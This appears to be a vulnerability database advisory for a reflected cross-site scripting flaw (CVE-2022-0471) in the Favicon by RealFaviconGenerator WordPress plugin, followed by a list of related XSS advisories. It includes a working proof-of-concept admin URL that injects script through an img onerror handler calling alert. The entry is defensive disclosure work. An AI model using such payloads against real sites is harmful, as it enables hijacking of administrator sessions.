Favicon by RealFaviconGenerator < 1.3.23 – Reflected Cross-Site Scripting | CVE 2022-0471 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape the json_result_url parameter before outputting it back in the Favicon admin dashboard, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

https://example.com/wp-admin/themes.php?page=favicon-by-realfavicongenerator%2Fadmin%2Fclass-favicon-by-realfavicongenerator-admin.phpfavicon_appearance_menu&json_result_url=.example.com%3C%2Fscript%3E%3Cimg%2Fsrc%2Fonerror%3Dalert%28/XSS/%29+%2F%2F

Affects Plugins

favicon-by-realfavicongenerator

Fixed in 1.3.23

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2695862

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

499bfee4-b481-4276-b6ad-0eead6680f66

Timeline

Publicly Published

2022-03-21 (about 3 years ago)

Added

2022-03-21 (about 3 years ago)

Last Updated

2022-04-10 (about 3 years ago)

Other

Published

Title

Published

2025-03-27

Title

User Registration < 4.0.4 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2021-01-05

Title

Contact Form Entries < 1.1.7 - Unauthenticated Stored Cross-Site Scripting

Published

2014-08-01

Title

jaspreetchahals-coupons-lite <= 2.1 - XSS in ZeroClipboard

Published

2024-06-06

Title

Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel – Combo Blocks < 2.2.81 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2022-02-22

Title

Transposh WordPress Translation < 1.0.8 - Reflected Cross-Site Scripting